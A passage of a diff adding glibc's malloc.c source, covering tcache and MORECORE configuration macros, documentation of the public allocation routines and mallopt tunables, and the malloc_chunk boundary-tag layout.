+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
